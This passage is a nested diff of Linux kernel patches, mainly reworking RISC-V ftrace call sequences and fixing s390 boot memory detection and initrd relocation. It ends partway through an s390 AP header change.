+--- a/arch/riscv/Kconfig
++++ b/arch/riscv/Kconfig
+@@ -138,7 +138,7 @@ config RISCV
+ 	select HAVE_DYNAMIC_FTRACE_WITH_REGS if HAVE_DYNAMIC_FTRACE
+ 	select HAVE_FTRACE_MCOUNT_RECORD if !XIP_KERNEL
+ 	select HAVE_FUNCTION_GRAPH_TRACER
+-	select HAVE_FUNCTION_TRACER if !XIP_KERNEL
++	select HAVE_FUNCTION_TRACER if !XIP_KERNEL && !PREEMPTION
+ 
+ config ARCH_MMAP_RND_BITS_MIN
+ 	default 18 if 64BIT
+diff --git a/arch/riscv/Makefile b/arch/riscv/Makefile
+index 82153960ac001..56b9219981665 100644
+--- a/arch/riscv/Makefile
++++ b/arch/riscv/Makefile
+@@ -11,7 +11,11 @@ LDFLAGS_vmlinux :=
+ ifeq ($(CONFIG_DYNAMIC_FTRACE),y)
+ 	LDFLAGS_vmlinux := --no-relax
+ 	KBUILD_CPPFLAGS += -DCC_USING_PATCHABLE_FUNCTION_ENTRY
+-	CC_FLAGS_FTRACE := -fpatchable-function-entry=8
++ifeq ($(CONFIG_RISCV_ISA_C),y)
++	CC_FLAGS_FTRACE := -fpatchable-function-entry=4
++else
++	CC_FLAGS_FTRACE := -fpatchable-function-entry=2
++endif
+ endif
+ 
+ ifeq ($(CONFIG_CMODEL_MEDLOW),y)
+diff --git a/arch/riscv/include/asm/ftrace.h b/arch/riscv/include/asm/ftrace.h
+index 04dad33800418..9e73922e1e2e5 100644
+--- a/arch/riscv/include/asm/ftrace.h
++++ b/arch/riscv/include/asm/ftrace.h
+@@ -42,6 +42,14 @@ struct dyn_arch_ftrace {
+  * 2) jalr: setting low-12 offset to ra, jump to ra, and set ra to
+  *          return address (original pc + 4)
+  *
++ *<ftrace enable>:
++ * 0: auipc  t0/ra, 0x?
++ * 4: jalr   t0/ra, ?(t0/ra)
++ *
++ *<ftrace disable>:
++ * 0: nop
++ * 4: nop
++ *
+  * Dynamic ftrace generates probes to call sites, so we must deal with
+  * both auipc and jalr at the same time.
+  */
+@@ -52,25 +60,43 @@ struct dyn_arch_ftrace {
+ #define AUIPC_OFFSET_MASK	(0xfffff000)
+ #define AUIPC_PAD		(0x00001000)
+ #define JALR_SHIFT		20
+-#define JALR_BASIC		(0x000080e7)
+-#define AUIPC_BASIC		(0x00000097)
++#define JALR_RA			(0x000080e7)
++#define AUIPC_RA		(0x00000097)
++#define JALR_T0			(0x000282e7)
++#define AUIPC_T0		(0x00000297)
+ #define NOP4			(0x00000013)
+ 
+-#define make_call(caller, callee, call)					\
++#define to_jalr_t0(offset)						\
++	(((offset & JALR_OFFSET_MASK) << JALR_SHIFT) | JALR_T0)
++
++#define to_auipc_t0(offset)						\
++	((offset & JALR_SIGN_MASK) ?					\
++	(((offset & AUIPC_OFFSET_MASK) + AUIPC_PAD) | AUIPC_T0) :	\
++	((offset & AUIPC_OFFSET_MASK) | AUIPC_T0))
++
++#define make_call_t0(caller, callee, call)				\
+ do {									\
+-	call[0] = to_auipc_insn((unsigned int)((unsigned long)callee -	\
+-				(unsigned long)caller));		\
+-	call[1] = to_jalr_insn((unsigned int)((unsigned long)callee -	\
+-			       (unsigned long)caller));			\
++	unsigned int offset =						\
++		(unsigned long) callee - (unsigned long) caller;	\
++	call[0] = to_auipc_t0(offset);					\
++	call[1] = to_jalr_t0(offset);					\
+ } while (0)
+ 
+-#define to_jalr_insn(offset)						\
+-	(((offset & JALR_OFFSET_MASK) << JALR_SHIFT) | JALR_BASIC)
++#define to_jalr_ra(offset)						\
++	(((offset & JALR_OFFSET_MASK) << JALR_SHIFT) | JALR_RA)
+ 
+-#define to_auipc_insn(offset)						\
++#define to_auipc_ra(offset)						\
+ 	((offset & JALR_SIGN_MASK) ?					\
+-	(((offset & AUIPC_OFFSET_MASK) + AUIPC_PAD) | AUIPC_BASIC) :	\
+-	((offset & AUIPC_OFFSET_MASK) | AUIPC_BASIC))
++	(((offset & AUIPC_OFFSET_MASK) + AUIPC_PAD) | AUIPC_RA) :	\
++	((offset & AUIPC_OFFSET_MASK) | AUIPC_RA))
++
++#define make_call_ra(caller, callee, call)				\
++do {									\
++	unsigned int offset =						\
++		(unsigned long) callee - (unsigned long) caller;	\
++	call[0] = to_auipc_ra(offset);					\
++	call[1] = to_jalr_ra(offset);					\
++} while (0)
+ 
+ /*
+  * Let auipc+jalr be the basic *mcount unit*, so we make it 8 bytes here.
+diff --git a/arch/riscv/include/asm/jump_label.h b/arch/riscv/include/asm/jump_label.h
+index 6d58bbb5da467..14a5ea8d8ef0f 100644
+--- a/arch/riscv/include/asm/jump_label.h
++++ b/arch/riscv/include/asm/jump_label.h
+@@ -18,6 +18,7 @@ static __always_inline bool arch_static_branch(struct static_key * const key,
+ 					       const bool branch)
+ {
+ 	asm_volatile_goto(
++		"	.align		2			\n\t"
+ 		"	.option push				\n\t"
+ 		"	.option norelax				\n\t"
+ 		"	.option norvc				\n\t"
+@@ -39,6 +40,7 @@ static __always_inline bool arch_static_branch_jump(struct static_key * const ke
+ 						    const bool branch)
+ {
+ 	asm_volatile_goto(
++		"	.align		2			\n\t"
+ 		"	.option push				\n\t"
+ 		"	.option norelax				\n\t"
+ 		"	.option norvc				\n\t"
+diff --git a/arch/riscv/include/asm/pgtable.h b/arch/riscv/include/asm/pgtable.h
+index 3e01f4f3ab08a..6da0f3285dd2e 100644
+--- a/arch/riscv/include/asm/pgtable.h
++++ b/arch/riscv/include/asm/pgtable.h
+@@ -415,7 +415,7 @@ static inline void update_mmu_cache(struct vm_area_struct *vma,
+ 	 * Relying on flush_tlb_fix_spurious_fault would suffice, but
+ 	 * the extra traps reduce performance.  So, eagerly SFENCE.VMA.
+ 	 */
+-	flush_tlb_page(vma, address);
++	local_flush_tlb_page(address);
+ }
+ 
+ #define __HAVE_ARCH_UPDATE_MMU_TLB
+diff --git a/arch/riscv/include/asm/thread_info.h b/arch/riscv/include/asm/thread_info.h
+index 67322f878e0d7..f704c8dd57e04 100644
+--- a/arch/riscv/include/asm/thread_info.h
++++ b/arch/riscv/include/asm/thread_info.h
+@@ -43,6 +43,7 @@
+ #ifndef __ASSEMBLY__
+ 
+ extern long shadow_stack[SHADOW_OVERFLOW_STACK_SIZE / sizeof(long)];
++extern unsigned long spin_shadow_stack;
+ 
+ #include <asm/processor.h>
+ #include <asm/csr.h>
+diff --git a/arch/riscv/kernel/ftrace.c b/arch/riscv/kernel/ftrace.c
+index 2086f65857737..5bff37af4770b 100644
+--- a/arch/riscv/kernel/ftrace.c
++++ b/arch/riscv/kernel/ftrace.c
+@@ -55,12 +55,15 @@ static int ftrace_check_current_call(unsigned long hook_pos,
+ }
+ 
+ static int __ftrace_modify_call(unsigned long hook_pos, unsigned long target,
+-				bool enable)
++				bool enable, bool ra)
+ {
+ 	unsigned int call[2];
+ 	unsigned int nops[2] = {NOP4, NOP4};
+ 
+-	make_call(hook_pos, target, call);
++	if (ra)
++		make_call_ra(hook_pos, target, call);
++	else
++		make_call_t0(hook_pos, target, call);
+ 
+ 	/* Replace the auipc-jalr pair at once. Return -EPERM on write error. */
+ 	if (patch_text_nosync
+@@ -70,42 +73,13 @@ static int __ftrace_modify_call(unsigned long hook_pos, unsigned long target,
+ 	return 0;
+ }
+ 
+-/*
+- * Put 5 instructions with 16 bytes at the front of function within
+- * patchable function entry nops' area.
+- *
+- * 0: REG_S  ra, -SZREG(sp)
+- * 1: auipc  ra, 0x?
+- * 2: jalr   -?(ra)
+- * 3: REG_L  ra, -SZREG(sp)
+- *
+- * So the opcodes is:
+- * 0: 0xfe113c23 (sd)/0xfe112e23 (sw)
+- * 1: 0x???????? -> auipc
+- * 2: 0x???????? -> jalr
+- * 3: 0xff813083 (ld)/0xffc12083 (lw)
+- */
+-#if __riscv_xlen == 64
+-#define INSN0	0xfe113c23
+-#define INSN3	0xff813083
+-#elif __riscv_xlen == 32
+-#define INSN0	0xfe112e23
+-#define INSN3	0xffc12083
+-#endif
+-
+-#define FUNC_ENTRY_SIZE	16
+-#define FUNC_ENTRY_JMP	4
+-
+ int ftrace_make_call(struct dyn_ftrace *rec, unsigned long addr)
+ {
+-	unsigned int call[4] = {INSN0, 0, 0, INSN3};
+-	unsigned long target = addr;
+-	unsigned long caller = rec->ip + FUNC_ENTRY_JMP;
++	unsigned int call[2];
+ 
+-	call[1] = to_auipc_insn((unsigned int)(target - caller));
+-	call[2] = to_jalr_insn((unsigned int)(target - caller));
++	make_call_t0(rec->ip, addr, call);
+ 
+-	if (patch_text_nosync((void *)rec->ip, call, FUNC_ENTRY_SIZE))
++	if (patch_text_nosync((void *)rec->ip, call, MCOUNT_INSN_SIZE))
+ 		return -EPERM;
+ 
+ 	return 0;
+@@ -114,15 +88,14 @@ int ftrace_make_call(struct dyn_ftrace *rec, unsigned long addr)
+ int ftrace_make_nop(struct module *mod, struct dyn_ftrace *rec,
+ 		    unsigned long addr)
+ {
+-	unsigned int nops[4] = {NOP4, NOP4, NOP4, NOP4};
++	unsigned int nops[2] = {NOP4, NOP4};
+ 
+-	if (patch_text_nosync((void *)rec->ip, nops, FUNC_ENTRY_SIZE))
++	if (patch_text_nosync((void *)rec->ip, nops, MCOUNT_INSN_SIZE))
+ 		return -EPERM;
+ 
+ 	return 0;
+ }
+ 
+-
+ /*
+  * This is called early on, and isn't wrapped by
+  * ftrace_arch_code_modify_{prepare,post_process}() and therefor doesn't hold
+@@ -144,10 +117,10 @@ int ftrace_init_nop(struct module *mod, struct dyn_ftrace *rec)
+ int ftrace_update_ftrace_func(ftrace_func_t func)
+ {
+ 	int ret = __ftrace_modify_call((unsigned long)&ftrace_call,
+-				       (unsigned long)func, true);
++				       (unsigned long)func, true, true);
+ 	if (!ret) {
+ 		ret = __ftrace_modify_call((unsigned long)&ftrace_regs_call,
+-					   (unsigned long)func, true);
++					   (unsigned long)func, true, true);
+ 	}
+ 
+ 	return ret;
+@@ -159,16 +132,16 @@ int ftrace_modify_call(struct dyn_ftrace *rec, unsigned long old_addr,
+ 		       unsigned long addr)
+ {
+ 	unsigned int call[2];
+-	unsigned long caller = rec->ip + FUNC_ENTRY_JMP;
++	unsigned long caller = rec->ip;
+ 	int ret;
+ 
+-	make_call(caller, old_addr, call);
++	make_call_t0(caller, old_addr, call);
+ 	ret = ftrace_check_current_call(caller, call);
+ 
+ 	if (ret)
+ 		return ret;
+ 
+-	return __ftrace_modify_call(caller, addr, true);
++	return __ftrace_modify_call(caller, addr, true, false);
+ }
+ #endif
+ 
+@@ -203,12 +176,12 @@ int ftrace_enable_ftrace_graph_caller(void)
+ 	int ret;
+ 
+ 	ret = __ftrace_modify_call((unsigned long)&ftrace_graph_call,
+-				    (unsigned long)&prepare_ftrace_return, true);
++				    (unsigned long)&prepare_ftrace_return, true, true);
+ 	if (ret)
+ 		return ret;
+ 
+ 	return __ftrace_modify_call((unsigned long)&ftrace_graph_regs_call,
+-				    (unsigned long)&prepare_ftrace_return, true);
++				    (unsigned long)&prepare_ftrace_return, true, true);
+ }
+ 
+ int ftrace_disable_ftrace_graph_caller(void)
+@@ -216,12 +189,12 @@ int ftrace_disable_ftrace_graph_caller(void)
+ 	int ret;
+ 
+ 	ret = __ftrace_modify_call((unsigned long)&ftrace_graph_call,
+-				    (unsigned long)&prepare_ftrace_return, false);
++				    (unsigned long)&prepare_ftrace_return, false, true);
+ 	if (ret)
+ 		return ret;
+ 
+ 	return __ftrace_modify_call((unsigned long)&ftrace_graph_regs_call,
+-				    (unsigned long)&prepare_ftrace_return, false);
++				    (unsigned long)&prepare_ftrace_return, false, true);
+ }
+ #endif /* CONFIG_DYNAMIC_FTRACE */
+ #endif /* CONFIG_FUNCTION_GRAPH_TRACER */
+diff --git a/arch/riscv/kernel/mcount-dyn.S b/arch/riscv/kernel/mcount-dyn.S
+index d171eca623b6f..125de818d1bab 100644
+--- a/arch/riscv/kernel/mcount-dyn.S
++++ b/arch/riscv/kernel/mcount-dyn.S
+@@ -13,8 +13,8 @@
+ 
+ 	.text
+ 
+-#define FENTRY_RA_OFFSET	12
+-#define ABI_SIZE_ON_STACK	72
++#define FENTRY_RA_OFFSET	8
++#define ABI_SIZE_ON_STACK	80
+ #define ABI_A0			0
+ #define ABI_A1			8
+ #define ABI_A2			16
+@@ -23,10 +23,10 @@
+ #define ABI_A5			40
+ #define ABI_A6			48
+ #define ABI_A7			56
+-#define ABI_RA			64
++#define ABI_T0			64
++#define ABI_RA			72
+ 
+ 	.macro SAVE_ABI
+-	addi	sp, sp, -SZREG
+ 	addi	sp, sp, -ABI_SIZE_ON_STACK
+ 
+ 	REG_S	a0, ABI_A0(sp)
+@@ -37,6 +37,7 @@
+ 	REG_S	a5, ABI_A5(sp)
+ 	REG_S	a6, ABI_A6(sp)
+ 	REG_S	a7, ABI_A7(sp)
++	REG_S	t0, ABI_T0(sp)
+ 	REG_S	ra, ABI_RA(sp)
+ 	.endm
+ 
+@@ -49,24 +50,18 @@
+ 	REG_L	a5, ABI_A5(sp)
+ 	REG_L	a6, ABI_A6(sp)
+ 	REG_L	a7, ABI_A7(sp)
++	REG_L	t0, ABI_T0(sp)
+ 	REG_L	ra, ABI_RA(sp)
+ 
+ 	addi	sp, sp, ABI_SIZE_ON_STACK
+-	addi	sp, sp, SZREG
+ 	.endm
+ 
+ #ifdef CONFIG_DYNAMIC_FTRACE_WITH_REGS
+ 	.macro SAVE_ALL
+-	addi	sp, sp, -SZREG
+ 	addi	sp, sp, -PT_SIZE_ON_STACK
+ 
+-	REG_S x1,  PT_EPC(sp)
+-	addi	sp, sp, PT_SIZE_ON_STACK
+-	REG_L x1,  (sp)
+-	addi	sp, sp, -PT_SIZE_ON_STACK
++	REG_S t0,  PT_EPC(sp)
+ 	REG_S x1,  PT_RA(sp)
+-	REG_L x1,  PT_EPC(sp)
+-
+ 	REG_S x2,  PT_SP(sp)
+ 	REG_S x3,  PT_GP(sp)
+ 	REG_S x4,  PT_TP(sp)
+@@ -100,15 +95,11 @@
+ 	.endm
+ 
+ 	.macro RESTORE_ALL
++	REG_L t0,  PT_EPC(sp)
+ 	REG_L x1,  PT_RA(sp)
+-	addi	sp, sp, PT_SIZE_ON_STACK
+-	REG_S x1,  (sp)
+-	addi	sp, sp, -PT_SIZE_ON_STACK
+-	REG_L x1,  PT_EPC(sp)
+ 	REG_L x2,  PT_SP(sp)
+ 	REG_L x3,  PT_GP(sp)
+ 	REG_L x4,  PT_TP(sp)
+-	REG_L x5,  PT_T0(sp)
+ 	REG_L x6,  PT_T1(sp)
+ 	REG_L x7,  PT_T2(sp)
+ 	REG_L x8,  PT_S0(sp)
+@@ -137,17 +128,16 @@
+ 	REG_L x31, PT_T6(sp)
+ 
+ 	addi	sp, sp, PT_SIZE_ON_STACK
+-	addi	sp, sp, SZREG
+ 	.endm
+ #endif /* CONFIG_DYNAMIC_FTRACE_WITH_REGS */
+ 
+ ENTRY(ftrace_caller)
+ 	SAVE_ABI
+ 
+-	addi	a0, ra, -FENTRY_RA_OFFSET
++	addi	a0, t0, -FENTRY_RA_OFFSET
+ 	la	a1, function_trace_op
+ 	REG_L	a2, 0(a1)
+-	REG_L	a1, ABI_SIZE_ON_STACK(sp)
++	mv	a1, ra
+ 	mv	a3, sp
+ 
+ ftrace_call:
+@@ -155,8 +145,8 @@ ftrace_call:
+ 	call	ftrace_stub
+ 
+ #ifdef CONFIG_FUNCTION_GRAPH_TRACER
+-	addi	a0, sp, ABI_SIZE_ON_STACK
+-	REG_L	a1, ABI_RA(sp)
++	addi	a0, sp, ABI_RA
++	REG_L	a1, ABI_T0(sp)
+ 	addi	a1, a1, -FENTRY_RA_OFFSET
+ #ifdef HAVE_FUNCTION_GRAPH_FP_TEST
+ 	mv	a2, s0
+@@ -166,17 +156,17 @@ ftrace_graph_call:
+ 	call	ftrace_stub
+ #endif
+ 	RESTORE_ABI
+-	ret
++	jr t0
+ ENDPROC(ftrace_caller)
+ 
+ #ifdef CONFIG_DYNAMIC_FTRACE_WITH_REGS
+ ENTRY(ftrace_regs_caller)
+ 	SAVE_ALL
+ 
+-	addi	a0, ra, -FENTRY_RA_OFFSET
++	addi	a0, t0, -FENTRY_RA_OFFSET
+ 	la	a1, function_trace_op
+ 	REG_L	a2, 0(a1)
+-	REG_L	a1, PT_SIZE_ON_STACK(sp)
++	mv	a1, ra
+ 	mv	a3, sp
+ 
+ ftrace_regs_call:
+@@ -196,6 +186,6 @@ ftrace_graph_regs_call:
+ #endif
+ 
+ 	RESTORE_ALL
+-	ret
++	jr t0
+ ENDPROC(ftrace_regs_caller)
+ #endif /* CONFIG_DYNAMIC_FTRACE_WITH_REGS */
+diff --git a/arch/riscv/kernel/time.c b/arch/riscv/kernel/time.c
+index 8217b0f67c6cb..1cf21db4fcc77 100644
+--- a/arch/riscv/kernel/time.c
++++ b/arch/riscv/kernel/time.c
+@@ -5,6 +5,7 @@
+  */
+ 
+ #include <linux/of_clk.h>
++#include <linux/clockchips.h>
+ #include <linux/clocksource.h>
+ #include <linux/delay.h>
+ #include <asm/sbi.h>
+@@ -29,6 +30,8 @@ void __init time_init(void)
+ 
+ 	of_clk_init(NULL);
+ 	timer_probe();
++
++	tick_setup_hrtimer_broadcast();
+ }
+ 
+ void clocksource_arch_init(struct clocksource *cs)
+diff --git a/arch/riscv/kernel/traps.c b/arch/riscv/kernel/traps.c
+index 549bde5c970a1..70c98ce23be24 100644
+--- a/arch/riscv/kernel/traps.c
++++ b/arch/riscv/kernel/traps.c
+@@ -34,10 +34,11 @@ void die(struct pt_regs *regs, const char *str)
+ 	static int die_counter;
+ 	int ret;
+ 	long cause;
++	unsigned long flags;
+ 
+ 	oops_enter();
+ 
+-	spin_lock_irq(&die_lock);
++	spin_lock_irqsave(&die_lock, flags);
+ 	console_verbose();
+ 	bust_spinlocks(1);
+ 
+@@ -54,7 +55,7 @@ void die(struct pt_regs *regs, const char *str)
+ 
+ 	bust_spinlocks(0);
+ 	add_taint(TAINT_DIE, LOCKDEP_NOW_UNRELIABLE);
+-	spin_unlock_irq(&die_lock);
++	spin_unlock_irqrestore(&die_lock, flags);
+ 	oops_exit();
+ 
+ 	if (in_interrupt())
+diff --git a/arch/riscv/mm/fault.c b/arch/riscv/mm/fault.c
+index d86f7cebd4a7e..eb0774d9c03b1 100644
+--- a/arch/riscv/mm/fault.c
++++ b/arch/riscv/mm/fault.c
+@@ -267,10 +267,12 @@ asmlinkage void do_page_fault(struct pt_regs *regs)
+ 	if (user_mode(regs))
+ 		flags |= FAULT_FLAG_USER;
+ 
+-	if (!user_mode(regs) && addr < TASK_SIZE &&
+-			unlikely(!(regs->status & SR_SUM)))
+-		die_kernel_fault("access to user memory without uaccess routines",
+-				addr, regs);
++	if (!user_mode(regs) && addr < TASK_SIZE && unlikely(!(regs->status & SR_SUM))) {
++		if (fixup_exception(regs))
++			return;
++
++		die_kernel_fault("access to user memory without uaccess routines", addr, regs);
++	}
+ 
+ 	perf_sw_event(PERF_COUNT_SW_PAGE_FAULTS, 1, regs, addr);
+ 
+diff --git a/arch/s390/boot/boot.h b/arch/s390/boot/boot.h
+index 70418389414d3..939a1b7806df2 100644
+--- a/arch/s390/boot/boot.h
++++ b/arch/s390/boot/boot.h
+@@ -8,10 +8,26 @@
+ 
+ #ifndef __ASSEMBLY__
+ 
++struct vmlinux_info {
++	unsigned long default_lma;
++	void (*entry)(void);
++	unsigned long image_size;	/* does not include .bss */
++	unsigned long bss_size;		/* uncompressed image .bss size */
++	unsigned long bootdata_off;
++	unsigned long bootdata_size;
++	unsigned long bootdata_preserved_off;
++	unsigned long bootdata_preserved_size;
++	unsigned long dynsym_start;
++	unsigned long rela_dyn_start;
++	unsigned long rela_dyn_end;
++	unsigned long amode31_size;
++};
++
+ void startup_kernel(void);
+-unsigned long detect_memory(void);
++unsigned long detect_memory(unsigned long *safe_addr);
+ bool is_ipl_block_dump(void);
+ void store_ipl_parmblock(void);
++unsigned long read_ipl_report(unsigned long safe_addr);
+ void setup_boot_command_line(void);
+ void parse_boot_command_line(void);
+ void verify_facilities(void);
+@@ -20,6 +36,7 @@ void sclp_early_setup_buffer(void);
+ void print_pgm_check_info(void);
+ unsigned long get_random_base(unsigned long safe_addr);
+ void __printf(1, 2) decompressor_printk(const char *fmt, ...);
++void error(char *m);
+ 
+ /* Symbols defined by linker scripts */
+ extern const char kernel_version[];
+@@ -31,8 +48,11 @@ extern char __boot_data_start[], __boot_data_end[];
+ extern char __boot_data_preserved_start[], __boot_data_preserved_end[];
+ extern char _decompressor_syms_start[], _decompressor_syms_end[];
+ extern char _stack_start[], _stack_end[];
+-
+-unsigned long read_ipl_report(unsigned long safe_offset);
++extern char _end[];
++extern unsigned char _compressed_start[];
++extern unsigned char _compressed_end[];
++extern struct vmlinux_info _vmlinux_info;
++#define vmlinux _vmlinux_info
+ 
+ #endif /* __ASSEMBLY__ */
+ #endif /* BOOT_BOOT_H */
+diff --git a/arch/s390/boot/decompressor.c b/arch/s390/boot/decompressor.c
+index b519a1f045d8f..d762733a07530 100644
+--- a/arch/s390/boot/decompressor.c
++++ b/arch/s390/boot/decompressor.c
+@@ -11,6 +11,7 @@
+ #include <linux/string.h>
+ #include <asm/page.h>
+ #include "decompressor.h"
++#include "boot.h"
+ 
+ /*
+  * gzip declarations
+diff --git a/arch/s390/boot/decompressor.h b/arch/s390/boot/decompressor.h
+index f75cc31a77dd9..92b81d2ea35d6 100644
+--- a/arch/s390/boot/decompressor.h
++++ b/arch/s390/boot/decompressor.h
+@@ -2,37 +2,11 @@
+ #ifndef BOOT_COMPRESSED_DECOMPRESSOR_H
+ #define BOOT_COMPRESSED_DECOMPRESSOR_H
+ 
+-#include <linux/stddef.h>
+-
+ #ifdef CONFIG_KERNEL_UNCOMPRESSED
+ static inline void *decompress_kernel(void) { return NULL; }
+ #else
+ void *decompress_kernel(void);
+ #endif
+ unsigned long mem_safe_offset(void);
+-void error(char *m);
+-
+-struct vmlinux_info {
+-	unsigned long default_lma;
+-	void (*entry)(void);
+-	unsigned long image_size;	/* does not include .bss */
+-	unsigned long bss_size;		/* uncompressed image .bss size */
+-	unsigned long bootdata_off;
+-	unsigned long bootdata_size;
+-	unsigned long bootdata_preserved_off;
+-	unsigned long bootdata_preserved_size;
+-	unsigned long dynsym_start;
+-	unsigned long rela_dyn_start;
+-	unsigned long rela_dyn_end;
+-	unsigned long amode31_size;
+-};
+-
+-/* Symbols defined by linker scripts */
+-extern char _end[];
+-extern unsigned char _compressed_start[];
+-extern unsigned char _compressed_end[];
+-extern char _vmlinux_info[];
+-
+-#define vmlinux (*(struct vmlinux_info *)_vmlinux_info)
+ 
+ #endif /* BOOT_COMPRESSED_DECOMPRESSOR_H */
+diff --git a/arch/s390/boot/kaslr.c b/arch/s390/boot/kaslr.c
+index e8d74d4f62aa5..58a8d8c8a1007 100644
+--- a/arch/s390/boot/kaslr.c
++++ b/arch/s390/boot/kaslr.c
+@@ -174,7 +174,6 @@ unsigned long get_random_base(unsigned long safe_addr)
+ {
+ 	unsigned long memory_limit = get_mem_detect_end();
+ 	unsigned long base_pos, max_pos, kernel_size;
+-	unsigned long kasan_needs;
+ 	int i;
+ 
+ 	memory_limit = min(memory_limit, ident_map_size);
+@@ -186,12 +185,7 @@ unsigned long get_random_base(unsigned long safe_addr)
+ 	 */
+ 	memory_limit -= kasan_estimate_memory_needs(memory_limit);
+ 
+-	if (IS_ENABLED(CONFIG_BLK_DEV_INITRD) && initrd_data.start && initrd_data.size) {
+-		if (safe_addr < initrd_data.start + initrd_data.size)
+-			safe_addr = initrd_data.start + initrd_data.size;
+-	}
+ 	safe_addr = ALIGN(safe_addr, THREAD_SIZE);
+-
+ 	kernel_size = vmlinux.image_size + vmlinux.bss_size;
+ 	if (safe_addr + kernel_size > memory_limit)
+ 		return 0;
+diff --git a/arch/s390/boot/mem_detect.c b/arch/s390/boot/mem_detect.c
+index 7fa1a32ea0f3f..daa1593171835 100644
+--- a/arch/s390/boot/mem_detect.c
++++ b/arch/s390/boot/mem_detect.c
+@@ -16,29 +16,10 @@ struct mem_detect_info __bootdata(mem_detect);
+ #define ENTRIES_EXTENDED_MAX						       \
+ 	(256 * (1020 / 2) * sizeof(struct mem_detect_block))
+ 
+-/*
+- * To avoid corrupting old kernel memory during dump, find lowest memory
+- * chunk possible either right after the kernel end (decompressed kernel) or
+- * after initrd (if it is present and there is no hole between the kernel end
+- * and initrd)
+- */
+-static void *mem_detect_alloc_extended(void)
+-{
+-	unsigned long offset = ALIGN(mem_safe_offset(), sizeof(u64));
+-
+-	if (IS_ENABLED(CONFIG_BLK_DEV_INITRD) && initrd_data.start && initrd_data.size &&
+-	    initrd_data.start < offset + ENTRIES_EXTENDED_MAX)
+-		offset = ALIGN(initrd_data.start + initrd_data.size, sizeof(u64));
+-
+-	return (void *)offset;
+-}
+-
+ static struct mem_detect_block *__get_mem_detect_block_ptr(u32 n)
+ {
+ 	if (n < MEM_INLINED_ENTRIES)
+ 		return &mem_detect.entries[n];
+-	if (unlikely(!mem_detect.entries_extended))
+-		mem_detect.entries_extended = mem_detect_alloc_extended();
+ 	return &mem_detect.entries_extended[n - MEM_INLINED_ENTRIES];
+ }
+ 
+@@ -147,7 +128,7 @@ static int tprot(unsigned long addr)
+ 	return rc;
+ }
+ 
+-static void search_mem_end(void)
++static unsigned long search_mem_end(void)
+ {
+ 	unsigned long range = 1 << (MAX_PHYSMEM_BITS - 20); /* in 1MB blocks */
+ 	unsigned long offset = 0;
+@@ -159,33 +140,34 @@ static void search_mem_end(void)
+ 		if (!tprot(pivot << 20))
+ 			offset = pivot;
+ 	}
+-
+-	add_mem_detect_block(0, (offset + 1) << 20);
++	return (offset + 1) << 20;
+ }
+ 
+-unsigned long detect_memory(void)
++unsigned long detect_memory(unsigned long *safe_addr)
+ {
+-	unsigned long max_physmem_end;
++	unsigned long max_physmem_end = 0;
+ 
+ 	sclp_early_get_memsize(&max_physmem_end);
++	mem_detect.entries_extended = (struct mem_detect_block *)ALIGN(*safe_addr, sizeof(u64));
+ 
+ 	if (!sclp_early_read_storage_info()) {
+ 		mem_detect.info_source = MEM_DETECT_SCLP_STOR_INFO;
+-		return max_physmem_end;
+-	}
+-
+-	if (!diag260()) {
++	} else if (!diag260()) {
+ 		mem_detect.info_source = MEM_DETECT_DIAG260;
+-		return max_physmem_end;
+-	}
+-
+-	if (max_physmem_end) {
++		max_physmem_end = max_physmem_end ?: get_mem_detect_end();
++	} else if (max_physmem_end) {
+ 		add_mem_detect_block(0, max_physmem_end);
+ 		mem_detect.info_source = MEM_DETECT_SCLP_READ_INFO;
+-		return max_physmem_end;
++	} else {
++		max_physmem_end = search_mem_end();
++		add_mem_detect_block(0, max_physmem_end);
++		mem_detect.info_source = MEM_DETECT_BIN_SEARCH;
++	}
++
++	if (mem_detect.count > MEM_INLINED_ENTRIES) {
++		*safe_addr += (mem_detect.count - MEM_INLINED_ENTRIES) *
++			     sizeof(struct mem_detect_block);
+ 	}
+ 
+-	search_mem_end();
+-	mem_detect.info_source = MEM_DETECT_BIN_SEARCH;
+-	return get_mem_detect_end();
++	return max_physmem_end;
+ }
+diff --git a/arch/s390/boot/startup.c b/arch/s390/boot/startup.c
+index 47ca3264c0230..e0863d28759a5 100644
+--- a/arch/s390/boot/startup.c
++++ b/arch/s390/boot/startup.c
+@@ -57,16 +57,17 @@ unsigned long mem_safe_offset(void)
+ }
+ #endif
+ 
+-static void rescue_initrd(unsigned long addr)
++static unsigned long rescue_initrd(unsigned long safe_addr)
+ {
+ 	if (!IS_ENABLED(CONFIG_BLK_DEV_INITRD))
+-		return;
++		return safe_addr;
+ 	if (!initrd_data.start || !initrd_data.size)
+-		return;
+-	if (addr <= initrd_data.start)
+-		return;
+-	memmove((void *)addr, (void *)initrd_data.start, initrd_data.size);
+-	initrd_data.start = addr;
++		return safe_addr;
++	if (initrd_data.start < safe_addr) {
++		memmove((void *)safe_addr, (void *)initrd_data.start, initrd_data.size);
++		initrd_data.start = safe_addr;
++	}
++	return initrd_data.start + initrd_data.size;
+ }
+ 
+ static void copy_bootdata(void)
+@@ -250,6 +251,7 @@ static unsigned long reserve_amode31(unsigned long safe_addr)
+ 
+ void startup_kernel(void)
+ {
++	unsigned long max_physmem_end;
+ 	unsigned long random_lma;
+ 	unsigned long safe_addr;
+ 	void *img;
+@@ -265,12 +267,13 @@ void startup_kernel(void)
+ 	safe_addr = reserve_amode31(safe_addr);
+ 	safe_addr = read_ipl_report(safe_addr);
+ 	uv_query_info();
+-	rescue_initrd(safe_addr);
++	safe_addr = rescue_initrd(safe_addr);
+ 	sclp_early_read_info();
+ 	setup_boot_command_line();
+ 	parse_boot_command_line();
+ 	sanitize_prot_virt_host();
+-	setup_ident_map_size(detect_memory());
++	max_physmem_end = detect_memory(&safe_addr);
++	setup_ident_map_size(max_physmem_end);
+ 	setup_vmalloc_size();
+ 	setup_kernel_memory_layout();
+ 
+diff --git a/arch/s390/include/asm/ap.h b/arch/s390/include/asm/ap.h
+index f508f5025e388..57a2d6518d272 100644
+--- a/arch/s390/include/asm/ap.h
++++ b/arch/s390/include/asm/ap.h
+@@ -239,7 +239,10 @@ static inline struct ap_queue_status ap_aqic(ap_qid_t qid,
+ 	union {
+ 		unsigned long value;
+ 		struct ap_qirq_ctrl qirqctrl;
+-		struct ap_queue_status status;
++		struct {
++			u32 _pad;
++			struct ap_queue_status status;
++		};
+ 	} reg1;
+ 	unsigned long reg2 = pa_ind;
+ 
+@@ -253,7 +256,7 @@ static inline struct ap_queue_status ap_aqic(ap_qid_t qid,
+ 		"	lgr	%[reg1],1\n"		/* gr1 (status) into reg1 */
+ 		: [reg1] "+&d" (reg1)
+ 		: [reg0] "d" (reg0), [reg2] "d" (reg2)
